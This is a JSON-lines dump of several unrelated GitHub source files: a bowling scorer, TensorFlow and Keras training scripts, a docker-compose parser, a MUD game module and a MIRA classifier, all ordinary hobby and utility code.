== 1])).mean(),\n roc_score,\n len(df_val) / (len(df_val) + len(df_fit))]\n\n return performance\n\n @staticmethod\n def _get_scv_data_frame(scores):\n \"\"\"\n Transforms performance scores into a data frame.\n\n Args:\n scores: List with performance metrics for each iteration of the experiment.\n\n Returns:\n pandas.DataFrame with structured performance data.\n\n \"\"\"\n return pd.DataFrame(scores, columns=[\"accuracy\", \"FNR\", \"FPR\", \"ROC AUC score\", \"strata weight\"])\n","repo_name":"imanolmorata/biosignal_classifiers","sub_path":"b2s_clf/experiments/stratified_cross_validation.py","file_name":"stratified_cross_validation.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10573060721","text":"NUMFRAMES = 10\r\nNUMPINS = 10\r\n\r\nclass bowlingScore():\r\n \r\n def __init__(self):\r\n pass\r\n \r\n def getTotalScore(self,scoreString):\r\n self.__getScoreString(scoreString)\r\n self.__calcSingleFrameValueList(self.scoreString)\r\n return sum(self.scoreListValues)\r\n \r\n # Private methods\r\n def __getScoreString(self,scoreString):\r\n self.scoreString = scoreString\r\n \r\n def __getScoreList(self,scoreString):\r\n return scoreString.split(' ')\r\n \r\n def __interpSingleFrameValue(self, scoreSymbol):\r\n if scoreSymbol == 'X':\r\n scoreValue = ['strike',10,0]\r\n \r\n elif scoreSymbol.find('-')>0:\r\n scoreValue = ['',int(scoreSymbol[0]),0]\r\n \r\n elif scoreSymbol.find('/')>0:\r\n if len(scoreSymbol) == 2:\r\n scoreValue = ['spare',int(scoreSymbol[0]),NUMPINS-int(scoreSymbol[0])]\r\n else:\r\n scoreValue = ['spare',int(scoreSymbol[0]),NUMPINS-int(scoreSymbol[0]),int(scoreSymbol[2])]\r\n \r\n else:\r\n raise Exception('score symbol undefined!')\r\n \r\n return scoreValue\r\n \r\n def __calcSingleFrameValueList(self,scoreString):\r\n scoreList = self.__getScoreList(scoreString)\r\n lenScoreList = len(scoreList)\r\n scoreListValues = []\r\n for idx in range(NUMFRAMES):\r\n val = []\r\n val_1stNext = []\r\n val_2ndNext = []\r\n \r\n val = self.__interpSingleFrameValue(scoreList[idx])\r\n if val[0] == 'strike':\r\n val_1stNext = self.__interpSingleFrameValue(scoreList[idx+1])\r\n if val_1stNext[0] == 'strike':\r\n val_2ndNext = self.__interpSingleFrameValue(scoreList[idx+1])\r\n scoreListValues.append(val[1]+val_1stNext[1]+val_2ndNext[1])\r\n else:\r\n scoreListValues.append(val[1]+val_1stNext[1]+val_1stNext[2])\r\n \r\n elif val[0] == 'spare':\r\n if (idx+1)seuil]=255\n a[b<-seuil]=0\n return a\n\ndef convolution(input, taille_noyau, nbr_noyau, stride, b_norm=False, f_activation=None, training=False):\n w_filtre=tf.Variable(tf.random.truncated_normal(shape=(taille_noyau, taille_noyau, int(input.get_shape()[-1]), nbr_noyau)))\n b_filtre=np.zeros(nbr_noyau)\n result=tf.nn.conv2d(input, w_filtre, strides=[1, stride, stride, 1], padding='SAME')+b_filtre\n if b_norm is True:\n result=tf.layers.batch_normalization(result, training=training)\n if f_activation is not None:\n result=f_activation(result)\n return result\n \ndef fc(input, nbr_neurone, b_norm=False, f_activation=None, training=False):\n w=tf.Variable(tf.random.truncated_normal(shape=(int(input.get_shape()[-1]), nbr_neurone), dtype=tf.float32))\n b=tf.Variable(np.zeros(shape=(nbr_neurone)), dtype=tf.float32)\n result=tf.matmul(input, w)+b\n if b_norm is True:\n result=tf.layers.batch_normalization(result, training=training)\n if f_activation is not None:\n result=f_activation(result) \n return result\n\ndef ia(nbr_classes, size, couche, learning_rate=1E-3):\n ph_images=tf.placeholder(shape=(None, size, size, couche), dtype=tf.float32, name='entree')\n ph_labels=tf.placeholder(shape=(None, nbr_classes), dtype=tf.float32)\n ph_is_training=tf.placeholder_with_default(False, (), name='is_training')\n \n result=convolution(ph_images, 3, 64, 1, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.3, training=ph_is_training)\n result=convolution(result, 3, 128, 1, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.4, training=ph_is_training)\n result=tf.nn.max_pool(result, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n result=tf.contrib.layers.flatten(result)\n \n result=fc(result, 128, True, tf.nn.relu, ph_is_training)\n result=tf.layers.dropout(result, 0.5, training=ph_is_training)\n result=fc(result, nbr_classes)\n socs=tf.nn.softmax(result, name=\"sortie\")\n \n loss=tf.nn.softmax_cross_entropy_with_logits_v2(labels=ph_labels, logits=result)\n extra_update_ops=tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train=tf.train.AdamOptimizer(learning_rate).minimize(loss)\n accuracy=tf.reduce_mean(tf.cast(tf.equal(tf.argmax(socs, 1), tf.argmax(ph_labels, 1)), tf.float32))\n\n return ph_images, ph_labels, ph_is_training, socs, train, accuracy, tf.train.Saver()\n\ntab_images=[]\ntab_labels=[]\n\nfor dir in [\"/usr/share/fonts/truetype/ubuntu-font-family/\", \"/usr/share/fonts/truetype/freefont/\"]:\n for root, dirs, files in os.walk(dir):\n for file in files:\n if file.endswith(\"ttf\"):\n print(root+\"/\"+file)\n for i in range(1, 10):\n for cpt in range(nbr):\n image=Image.new(\"L\", (28, 28))\n draw=ImageDraw.Draw(image)\n font=ImageFont.truetype(root+\"/\"+file, np.random.randint(26, 32))\n text=\"{:d}\".format(i)\n draw.text((np.random.randint(1, 10), np.random.randint(-4, 0)), text, font=font, fill=(255))\n image=np.array(image).reshape(28, 28, 1)\n tab_images.append(image)\n tab_labels.append(np.eye(10)[i]) \n image_m=modif_image(image, 1.05+np.random.rand())\n tab_images.append(image_m)\n tab_labels.append(np.eye(10)[i])\n image=np.zeros((28, 28, 1))\n for cpt in range(3*nbr):\n image_m=modif_image(image, 1.05+np.random.rand())\n tab_images.append(image_m)\n tab_labels.append(np.eye(10)[0])\n \ntab_images=np.array(tab_images)\ntab_labels=np.array(tab_labels)\n\ntab_images=tab_images/255\n\ntab_images, tab_labels=shuffle(tab_images, tab_labels)\n\nif False: # Changer en True si vous voulez voir les images générées\n for i in range(len(tab_images)):\n cv2.imshow('chiffre', tab_images[i].reshape(28, 28, 1))\n print(tab_labels[i], np.argmax(tab_labels[i]))\n if cv2.waitKey()&0xFF==ord('q'):\n break\n\nprint(\"Nbr:\", len(tab_images))\n\ntrain_images, test_images, train_labels, test_labels=train_test_split(tab_images, tab_labels, test_size=0.10)\n\nimages, labels, is_training, sortie, train, accuracy, saver=ia(10, 28, 1)\n\nwith tf.Session() as s:\n s.run(tf.global_variables_initializer())\n tab_train=[]\n tab_test=[]\n for id_entrainement in np.arange(nbr_entrainement):\n print(\"> Entrainement\", id_entrainement)\n for batch in np.arange(0, len(train_images), taille_batch):\n s.run(train, feed_dict={\n images: train_images[batch:batch+taille_batch],\n labels: train_labels[batch:batch+taille_batch],\n is_training: True\n })\n print(\" entrainement OK\")\n tab_accuracy_train=[]\n for batch in np.arange(0, len(train_images), taille_batch):\n p=s.run(accuracy, feed_dict={\n images: train_images[batch:batch+taille_batch],\n labels: train_labels[batch:batch+taille_batch],\n is_training: True\n })\n tab_accuracy_train.append(p)\n print(\" train:\", np.mean(tab_accuracy_train))\n tab_accuracy_test=[]\n for batch in np.arange(0, len(test_images), taille_batch):\n p=s.run(accuracy, feed_dict={\n images: test_images[batch:batch+taille_batch],\n labels: test_labels[batch:batch+taille_batch],\n is_training: True\n })\n tab_accuracy_test.append(p)\n print(\" test :\", np.mean(tab_accuracy_test))\n tab_train.append(1-np.mean(tab_accuracy_train))\n tab_test.append(1-np.mean(tab_accuracy_test))\n saver.save(s, './mon_modele/modele')\n","repo_name":"L42Project/Tutoriels","sub_path":"Divers/tutoriel18-2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"81"} +{"seq_id":"17892800798","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import Input, Dense, BatchNormalization, Activation\n\nfrom keras.datasets import mnist\n\nglobalSeed=56\nfrom numpy.random import seed\nseed(globalSeed)\nfrom tensorflow import set_random_seed\nset_random_seed(globalSeed)\n\n###############################################################################\n# General Plot Functions \n###############################################################################\n\n#Elimates the left and top lines and ticks in a matplotlib plot \ndef PlotStyle(Axes,Title):\n \n \"\"\"\n General plot style function\n \"\"\"\n \n Axes.spines['top'].set_visible(False)\n Axes.spines['right'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.xaxis.set_tick_params(labelsize=14)\n Axes.yaxis.set_tick_params(labelsize=14)\n Axes.set_title(Title)\n\n###############################################################################\n# Loading the dataset \n###############################################################################\n\n(Xtrain, Ytrain), (Xtest, Ytest) = mnist.load_data()\n\nXtrain = Xtrain.astype('float32') / 255.\nXtest = Xtest.astype('float32') / 255.\nXtrain = Xtrain.reshape((len(Xtrain), np.prod(Xtrain.shape[1:])))\nXtest = Xtest.reshape((len(Xtest), np.prod(Xtest.shape[1:])))\n\n###############################################################################\n# Vanilla Autoencoder \n###############################################################################\n# Modified from https://blog.keras.io/building-autoencoders-in-keras.html\n\n# this is the size of our encoded representations\nencoding_dim = 2\n\n# this is our input placeholder\ninput_img = Input(shape=(784,))\n# \"encoded\" is the encoded representation of the input\nencoded = Dense(encoding_dim, activation='relu')(input_img)\n# \"decoded\" is the lossy reconstruction of the input\ndecoded = Dense(784, activation='sigmoid')(encoded)\n\n# this model maps an input to its reconstruction\nautoencoder = Model(input_img, decoded)\n\nencoder = Model(input_img, encoded)\n\nencoded_input = Input(shape=(encoding_dim,))\n# retrieve the last layer of the autoencoder model\ndecoder_layer = autoencoder.layers[-1]\n# create the decoder model\ndecoder = Model(encoded_input, decoder_layer(encoded_input))\n\nautoencoder.compile(optimizer=Adam(lr=0.00025), loss='mse')\nautoencoder.fit(Xtrain, Xtrain,epochs=25,batch_size=256,shuffle=True)\n\nbaselinePerformance=autoencoder.evaluate(Xtest,Xtest)\n\n###############################################################################\n# Neural network generation\n###############################################################################\nlatent_dim=2\n\ndef MakeEncoder(InputFunction,EncoderArchitecture):\n \n \"\"\"\n Generates the encoder network using the functional API from keras \n Its Intended as a wrapper function for TrainAutoencoder \n \n InputFunction Input function from the keras functional API \n EncoderArchitecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n \n \"\"\"\n \n inputEncoder=InputFunction\n \n en=Dense(EncoderArchitecture[0])(inputEncoder)\n en=Activation('relu')(en)\n \n for j in range(len(EncoderArchitecture)-1):\n \n en=Dense(EncoderArchitecture[j+1])(en)\n en=Activation('relu')(en)\n \n en=Dense(latent_dim)(inputEncoder)\n output=Activation('relu')(en)\n \n Encoder=Model(inputEncoder,output,name='Encoder')\n \n return Encoder\n\ndef MakeDecoder(InputFunction,EncoderArchitecture):\n \n \"\"\"\n Generates the decoder network using the functional API from keras \n Its Intended as a wrapper function for TrainAutoencoder \n \n InputFunction Input function from the keras functional API \n EncoderArchitecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n \n \"\"\"\n \n inputDecoder=InputFunction\n reversedArchitecture=EncoderArchitecture[::-1]\n \n dec=Dense(reversedArchitecture[0])(inputDecoder)\n dec=Activation('relu')(dec)\n \n for k in range(len(reversedArchitecture)-1):\n \n dec=Dense(reversedArchitecture[k+1])(dec)\n dec=Activation('relu')(dec)\n \n dec=Dense(784)(dec)\n output=Activation('sigmoid')(dec)\n \n Decoder=Model(inputDecoder,output,name='Decoder')\n \n return Decoder\n\ndef TrainAutoencoder(Architecture,TrainData):\n \n \"\"\"\n Wrapper function to train the autoencoder network\n \n Architecture A list with the number of dense units in the layer,\n the lenght of the list is the number of layers in the \n network \n TrainData Data used to train the autoencoder network.\n \n \"\"\"\n \n inputEncoder=Input(shape=(784,),name='InputEncoder')\n inputDecoder=Input(shape=(latent_dim,),name='InputDecoder')\n Encoder=MakeEncoder(inputEncoder,Architecture)\n Decoder=MakeDecoder(inputDecoder,Architecture)\n output=Decoder(Encoder(inputEncoder))\n Autoencoder=Model(inputEncoder,output,name='Autoencoder')\n \n Autoencoder.summary()\n Autoencoder.compile(loss='mse',optimizer=Adam(lr=0.00025))\n Autoencoder.fit(TrainData,TrainData,batch_size=256,epochs=25,shuffle=True)\n \n return Encoder, Autoencoder\n\n###############################################################################\n# Tournament approach\n###############################################################################\n\ndef TournamentSearch(Population):\n \n \"\"\"\n \n Generates a population of candidate architectures, train an autoencoder\n and returns the performance of each candidate solution. \n \n Population Number of candidate architectures to be generated \n \n \"\"\"\n \n localPopulation=Population\n localBound=784\n \n archContainer=[]\n fitness=[]\n params=[]\n \n for k in range(localPopulation):\n \n randomDepth=np.random.randint(2,10)\n randomArchitecture=np.random.randint(2,localBound,size=randomDepth)\n randomArchitecture=list(np.sort(randomArchitecture))\n localArch=randomArchitecture[::-1]\n \n _,localAutoencoder=TrainAutoencoder(localArch,Xtrain)\n \n fitness.append(localAutoencoder.evaluate(Xtest,Xtest))\n params.append(localAutoencoder.count_params())\n \n archContainer.append(localArch)\n \n return archContainer,fitness,params\n\n###############################################################################\n# Tournament performance \n###############################################################################\n\narchs,performanceTournament,numberOfParams=TournamentSearch(50)\nmaxParams=np.max(numberOfParams)\n\nperformanceImprovement=[100*(1-(val/baselinePerformance)) for val in performanceTournament]\nparameterImprovement=[(val/maxParams) for val in numberOfParams]\n\nplt.figure(1,figsize=(10,10))\nplt.bar(np.arange(len(performanceImprovement)),performanceImprovement,parameterImprovement)\nplt.xlabel('Architectures',fontsize=24)\nplt.ylabel('Performance Improvement',fontsize=24)\nax=plt.gca()\nPlotStyle(ax,'')\n\n###############################################################################\n# Evolution approach\n###############################################################################\n \ndef MakeArchitectureMutations(NetworkArchitectures):\n \n \"\"\"\n \n Modify the candidate solutions and add new randomly generated candidate \n solutions \n \n NetworkArchitectures List of list with the best candidate solutions \n \n \"\"\"\n \n localNA=NetworkArchitectures\n localBound=784\n nArchs=len(localNA)\n mutatedArchs=[]\n \n for arch in localNA:\n \n archDepth=len(arch)\n randIndex=np.random.randint(0,archDepth)\n bufferArch=arch.copy()\n bufferArch[randIndex]=np.random.randint(2,localBound)\n mutatedArchs.append(bufferArch)\n \n for k in range(nArchs):\n \n randomDepth=np.random.randint(2,10)\n randomArchitecture=list(np.random.randint(2,localBound,size=randomDepth))\n mutatedArchs.append(randomArchitecture)\n \n return mutatedArchs\n \n\ndef NetworkEvolution(Generations,Population):\n \n \"\"\"\n \n Architecture optimization by evolutionary methods. \n \n Generation Number of iterations in the tournament search. \n Population Number of candidate architectures to be generated \n \n \"\"\"\n \n localGenerations=Generations\n localPopulation=Population\n \n archs,fitness,params=TournamentSearch(localPopulation)\n sortedIndex=np.argsort(np.array(fitness))\n selectedArchs=[archs[val] for val in sortedIndex[0:int(localPopulation/2)] ]\n \n bestArch=[archs[sortedIndex[0]]]\n bestFitness=[fitness[sortedIndex[0]]]\n bestParams=[params[sortedIndex[0]]]\n \n for k in range(localGenerations):\n \n archs=MakeArchitectureMutations(selectedArchs)\n fitness=[]\n params=[]\n \n for localArch in archs:\n \n _,localAutoencoder=TrainAutoencoder(localArch,Xtrain)\n fitness.append(localAutoencoder.evaluate(Xtest,Xtest))\n params.append(localAutoencoder.count_params())\n \n sortedIndex=np.argsort(np.array(fitness))\n \n bestArch.append(archs[sortedIndex[0]])\n bestFitness.append(fitness[sortedIndex[0]])\n bestParams.append(params[sortedIndex[0]])\n \n selectedArchs=[archs[val] for val in sortedIndex[0:int(localPopulation/2)] ]\n \n return bestArch,bestFitness,bestParams\n \n###############################################################################\n# Evolution performance \n###############################################################################\n\narchs1,performanceDE,numberOfParams1=NetworkEvolution(10,6)\nmaxParams1=np.max(numberOfParams1)\n\nperformanceImprovement1=[100*(1-(val/baselinePerformance)) for val in performanceDE]\nparameterImprovement1=[(val/maxParams1) for val in numberOfParams1]\n\nplt.figure(2,figsize=(10,10))\nplt.bar(np.arange(len(performanceImprovement1)),performanceImprovement1,parameterImprovement1)\nplt.xlabel('Architectures',fontsize=24)\nplt.ylabel('Performance Improvement',fontsize=24)\nax=plt.gca()\nPlotStyle(ax,'')\n","repo_name":"TavoGLC/DataAnalysisByExample","sub_path":"NeuralNetworks/Autoencoder.py","file_name":"Autoencoder.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"74175630983","text":"# -*- coding: utf-8 -*-\n\"\"\"This module creates the all the commands related to the services this includes building images, running the\nimages and connecting networks.\n\n.. _Google Python Style Guide:\n http://google.github.io/styleguide/pyguide.html\n\n\"\"\"\n\nfrom ..parser import Parser\nfrom .build import ServiceBuildParser\nfrom .networks import ServiceNetworkParser\n\n\nclass ServicesParser(Parser):\n \"\"\"This class converts service in docker-compose services into various docker commands.\n For example given the below yaml definition (docker-compose.yml).\n\n ::\n\n services:\n webapp:\n build:\n context: ./dir\n dockerfile: Dockerfile-alternate\n container_name: MyContainer\n networks:\n app_net:\n ipv4_address: 172.16.238.10\n\n Once parsed it will look something like:\n\n ::\n\n \"webapp\": {\n \"build\":{\n \"context\": \"./dir\",\n \"dockerfile\": \"Dockerfile-alternate\",\n },\n \"container_name\": MyContainer,\n \"networks\": {\n \"app_net\": {\n \"ipv4_address\": \"172.16.238.10\",\n }\n }\n },\n\n We generate the following command:\n\n ::\n\n docker build --file Dockerfile-alternate --tag composerisation_webapp ./dir\n docker run --name MyContainer --detach composerisation_webapp\n docker network connect --ip 172.16.238.10 app_net composerisation_webapp\n\n Following config options are ignored:\n\n - configs\n - credential_spec\n - depends_on\n - deploy\n - external_links\n - healthcheck\n - secrets\n - volume (long syntax)\n\n Args:\n service_name (str): The service name.\n service_options (dict): The service config options.\n\n \"\"\"\n\n def __init__(self, service_name: str, service_options: dict):\n args = {\n \"cap_add\": {\"type\": [list], \"name\": \"--cap-add\"},\n \"cap_drop\": {\"type\": [list], \"name\": \"--cap-drop\"},\n \"cgroup_parent\": {\"type\": [str], \"name\": \"--cgroup-parent\"},\n \"container_name\": {\"type\": [str], \"name\": \"--name\"},\n \"device\": {\"type\": [list], \"name\": \"--device\"},\n \"dns\": {\"type\": [list, str], \"name\": \"--dns\"},\n \"dns_search\": {\"type\": [list, str], \"name\": \"--dns-search\"},\n \"entrypoint\": {\"type\": [str], \"name\": \"--entrypoint\"},\n \"env_file\": {\"type\": [list, str], \"name\": \"--env-file\"},\n \"environment\": {\"type\": [list, dict], \"name\": \"--environment\"},\n \"expose\": {\"type\": [list], \"name\": \"--expose\"},\n \"extra_hosts\": {\"type\": [list], \"name\": \"--add-host\"},\n \"init\": {\"type\": [bool], \"name\": \"--init\"},\n \"isolation\": {\"type\": [str], \"name\": \"--isolation\"},\n \"labels\": {\"type\": [list], \"name\": \"--label\"},\n \"links\": {\"type\": [list], \"name\": \"--link\"},\n \"network_mode\": {\"type\": [str], \"name\": \"--network\"},\n \"pid\": {\"type\": [str], \"name\": \"--pid\"},\n \"ports\": {\"type\": [list], \"name\": \"--publish\"},\n \"restart\": {\"type\": [str], \"name\": \"--restart\"},\n \"security_opt\": {\"type\": [list], \"name\": \"--security-opt\"},\n \"stop_grace_period\": {\"type\": [str], \"name\": \"--stop-timeout\"},\n \"stop_signal\": {\"type\": [str], \"name\": \"--stop-signal\"},\n \"sysctls\": {\"type\": [list, dict], \"name\": \"--sysctl\"},\n \"tmpfs\": {\"type\": [list], \"name\": \"--tmpfs\"},\n \"userns_mode\": {\"type\": [str], \"name\": \"--userns\"},\n \"volumes\": {\"type\": [list], \"name\": \"--volume\"},\n }\n special_args = {\"ulimits\": self._parse_ulimits, \"logging\": self._parse_logging}\n ignore_args = [\n \"build\",\n \"command\",\n \"configs\",\n \"credential_spec\",\n \"depends_on\",\n \"deploy\",\n \"external_links\",\n \"healthcheck\",\n \"networks\",\n \"image\",\n \"secrets\",\n ]\n super().__init__(\n args=args,\n config_name=service_name,\n config_options=service_options,\n special_args=special_args,\n ignore_args=ignore_args,\n )\n\n def get_start_command(self) -> list:\n \"\"\"This function returns a list of all the commands you will need to recreate the docker-compose service\n using the docker cli. Each item in the list is a docker command you can run. They should be in the\n order they are presented in, for example you need to build a container before you can run it.\n\n For each service you will always get a `docker run` command you may also get a `docker build` and a\n `docker network` depending on what config options are set within that service (build/networking).\n\n Returns:\n list: A list of commands required by the services this includes `docker build`, `docker run` and \\\n `docker network connect`.\n\n \"\"\"\n service_commands = []\n image_name = self._get_image_name()\n container_name = self._get_container_name()\n\n if \"build\" in self.config_options:\n build_config = self.config_options[\"build\"]\n build = ServiceBuildParser(service_name=image_name, build_config=build_config)\n build_command = build.get_command()\n service_commands.append(build_command)\n\n run_command = self._add_run_command(container_name, image_name)\n service_commands.append(run_command)\n\n if \"networks\" in self.config_options:\n networks_config = self.config_options[\"networks\"]\n for name, config in networks_config.items():\n network = ServiceNetworkParser(service_name=container_name, network_name=name, network_config=config)\n network_command = network.get_command()\n service_commands.append(network_command)\n return service_commands\n\n def _add_run_command(self, container_name: str, image_name: str) -> str:\n \"\"\"This function will get the equivalent `docker run` command for a given service config in docker compose.\n Including the args required. If a name is not specified the container will be named after the service.\n\n Args:\n container_name (str): What to call the container once it's running.\n image_name (str): The name of the image we will run.\n\n Returns:\n str: The `docker run` commands for the given `service_options`. This will start our docker image and run \\\n it.\n\n \"\"\"\n args = self._get_args()\n if \"container_name\" not in self.config_options:\n args += f\" --name {container_name}\"\n\n command = self.config_options.get(\"command\", \"\")\n if isinstance(command, list):\n command = \" \".join(command)\n command = f'\"{command}\"'\n\n run_command = f\"docker run {args} --detach {image_name} {command}\".strip()\n return run_command\n\n def get_delete_command(self) -> list:\n \"\"\"This function returns the a list of commands to remove the docker container from your system.\n\n Returns:\n list: Of commands required to remove a running docker contianer.\n\n \"\"\"\n container_name = self._get_container_name()\n stop_command = f\"docker stop {container_name}\"\n remove_command = f\"docker rm {container_name}\"\n return [stop_command, remove_command]\n\n def _parse_ulimits(self, ulimits: dict) -> str:\n \"\"\"For parsing any `ulimits` options with in docker-compose the logic for this is a bit more complicated as\n compared with normal args. The key and value parsed can be of any value and they can also define hard & soft\n values.This function will get passed to the `_get_args()` function as `kwargs`.\n\n Example `ulimits` config option below.\n\n ::\n\n {\"nproc\": 65535, \"nofile\": {\"soft\": 20000, \"hard\": 40000}}\n\n Example arguments returned.\n\n ::\n\n --ulimit nproc=65535 --ulimit nofile=20000:40000\n\n Args:\n ulimits (dict): The ulimits config options (see example above).\n\n Returns:\n str: The equivalent cli arguments for docker commands for `ulimits` option in docker-compose.\n\n \"\"\"\n ulimit_args = \"\"\n for name, value in ulimits.items():\n if isinstance(value, dict):\n soft, hard = value[\"soft\"], value[\"hard\"]\n ulimit = f\"--ulimit {name}={soft}:{hard} \"\n else:\n ulimit = f\"--ulimit {name}={value} \"\n ulimit_args += ulimit\n\n return ulimit_args\n\n def _parse_logging(self, logging: dict) -> str:\n \"\"\"For parsing any `logging` options with in docker-compose the logic for this is a bit more complicated as\n compared with normal args. We need to parse the `logging` object. For example it can contain a driving logger\n and then extra logging options where the key and value can be \"anything\". This function will get passed to the\n `_get_args()` function as `kwargs`.\n\n Example `logging` config option below.\n\n ::\n\n {\"driver\": \"json-file\", \"options\": {\"max-size\": \"1k\", \"max-file\": \"3\"}}\n\n\n Example arguments returned.\n\n ::\n\n --log-driver json-file --log-opt max-size=1k --log-opt max-file=3\n\n Args:\n logging (dict): The logging config options (see example above).\n\n Returns:\n str: The equivalent cli arguments for docker commands for `logging` option in docker-compose.\n\n \"\"\"\n logging_args = \"\"\n driver = logging.get(\"driver\", \"\")\n logging_args += f\"--log-driver {driver} \"\n logging_opts = self._get_config_val(config=logging, config_key=\"options\")\n\n for name, value in logging_opts.items():\n logging_args += f\"--log-opt {name}={value} \"\n\n return logging_args\n","repo_name":"hmajid2301/composerisation","sub_path":"src/composerisation/docker_compose/services/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35465492193","text":"from core.module import Module\nfrom collections import deque\n\nclass RefiningModule(Module):\n\n def __init__(self, *args):\n super(RefiningModule, self).__init__(*args)\n\n self.room_queue = deque([])\n self.foci_located = False\n self.searching = False\n self.last_room = 0\n \n foci_definition = {\n \"fun\": self.foci_trigger,\n \"arg\": \"%P1\",\n }\n\n self.state[\"trigger_builder\"].build({\n \"^You detect (\\d+) (lesser|minor) (foci|focus).$\": foci_definition,\n \"^There are a total of \\d+ foci globally\\.$\": self.complete_check,\n \"^You have moved away from your path\\.$\": self.path_fail,\n })\n\n self.state[\"alias_builder\"].build({\n \"startfindfoci\": self.start,\n \"findfoci\": self.find_foci,\n \"resumefoci\": self.resume,\n \"stopfoci\": self.stop,\n })\n\n def foci_trigger(self, num):\n count = int(num)\n if count > 0:\n self.foci_located = True\n\n def complete_check(self):\n if self.foci_located:\n self.mud.info(\"FOCI\")\n self.foci_located = False\n else:\n self.find_foci()\n\n def start(self):\n self.mud.info(\"Starting FOCI search\")\n self.searching = True\n self.load_path_rooms()\n self.find_foci()\n\n def stop(self):\n self.mud.info(\"Stopping FOCI search\")\n self.searching = False\n\n def resume(self):\n self.mud.info(\"Resuming FOCI search\")\n self.searching = True\n self.find_foci()\n\n def find_foci(self):\n if not self.room_queue or not self.searching:\n return\n\n self.last_room = self.room_queue.popleft()\n self.mud.info(\"Tracking to %d (%d)\" % (self.last_room, len(self.room_queue)))\n self.mud.eval(\"mq leylines\")\n self.mud.eval(\"q go %d\" % self.last_room)\n\n def path_fail(self):\n if self.last_room:\n self.mud.info(\"Pathing failed, retrying\")\n self.mud.send(\"path track %d\" % self.last_room)\n\n def load_path_rooms(self):\n self.mud.info(\"Loading rooms to queue\")\n rooms = [\n 250, 36824, 20389, 5599, 22477, 22824, 10813, 26690,\n 16437, 18462, 20754, 5682, 21908, 3106, 1745, 12332,\n 20450, 24628, 22702, 23128, 1773, 16706, 17612, 20932,\n 19323, 58675, 3887, 55189, 19621, 17032, 18082, 25408,\n 27704, 13425, 20281, 56942, 54482, 4740, 19320, 20855,\n 23202, 56647, 23791, 19810, 26820, 55276, 19344, 19602,\n 22866, 57334, 19854, 4828, 60845, 19626, 22226, 10046,\n 15714, 3273, 15344, 26920, 14729, 19987, 59609, 2030,\n 16282, 4964, 35217, 56731, 36270, 36677, 38090, 38894,\n 16274, 45483, 49286, 36824, 57521, 54770\n ]\n\n rooms.sort()\n\n self.room_queue = deque(rooms)\n","repo_name":"Xarikins/aetolia-script","sub_path":"refining_module.py","file_name":"refining_module.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17791339378","text":"# mira.py\n# -------\n\n\n# Mira implementation\n\nimport util\nPRINT = True\n\n\nclass MiraClassifier:\n \"\"\"\n Mira classifier.\n\n Note that the variable 'datum' in this code refers to a counter of features\n (not to a raw samples.Datum).\n \"\"\"\n def __init__( self, legalLabels, max_iterations):\n self.legalLabels = legalLabels\n self.type = \"mira\"\n self.automaticTuning = False\n self.C = 0.001\n self.max_iterations = max_iterations\n self.initializeWeightsToZero()\n\n def initializeWeightsToZero(self):\n \"Resets the weights of each label to zero vectors\"\n self.weights = {}\n for label in self.legalLabels:\n self.weights[label] = util.Counter() # this is the data-structure you should use\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n \"Outside shell to call your method. Do not modify this method.\"\n\n if (self.automaticTuning):\n Cgrid = [0.002, 0.004, 0.008]\n else:\n Cgrid = [self.C]\n\n return self.trainAndTune(trainingData, trainingLabels, validationData, validationLabels, Cgrid)\n\n \n \n \n def trainAndTune(self, trainingData, trainingLabels, validationData, validationLabels, Cgrid):\n \n \n # DO NOT ZERO OUT YOUR WEIGHTS BEFORE STARTING TRAINING, OR\n # THE AUTOGRADER WILL LIKELY DEDUCT POINTS.\n \n\n self.features = trainingData[0].keys()\n\n newWeights = self.weights.copy()\n self.features = trainingData[0].keys()\n newWeights = self.weights.copy()\n\n bestAccuracy = 0\n correct = 0.0\n\n for c in Cgrid:\n self.weights = newWeights.copy()\n for iteration in range(self.max_iterations):\n print(\"Starting iteration\", iteration, \"...\")\n for datum,trueLabel in zip(trainingData,trainingLabels):\n scores = util.Counter()\n for label in self.legalLabels: scores[label] = self.weights[label] * datum\n guess = scores.argMax()\n if guess != trueLabel:\n dif = self.weights[guess] - self.weights[trueLabel]\n prod = 0 #producto\n sumC = 0 #Suma de los cuadrados\n for feature in self.features:\n prod += datum[feature] * dif[feature]\n sumC += datum[feature]**2\n tau = min(c, (prod + 1.0) / (2.0 * sumC))\n for feature in datum:\n self.weights[trueLabel][feature] += tau * datum[feature]\n self.weights[guess][feature] -= tau * datum[feature]\n else: correct +=1.0\n \n #Calcular la precision\n accuracy = correct / len(validationData)\n if accuracy > bestAccuracy:\n bestAccuracy = accuracy\n bestWeight = self.weights\n\n self.weights = bestWeight\n \n \n \n def classify(self, data ):\n \"\"\"\n Classifies each datum as the label that most closely matches the prototype vector\n for that label. See the project description for details.\n\n Recall that a datum is a util.counter...\n \"\"\"\n \n guesses = []\n #for i in range(len(data)):\n for datum in data:\n scores = util.Counter()\n for label in self.legalLabels:\n scores[label] = self.weights[label] * datum\n guess = scores.argMax()\n guesses.append(guess)\n\n return 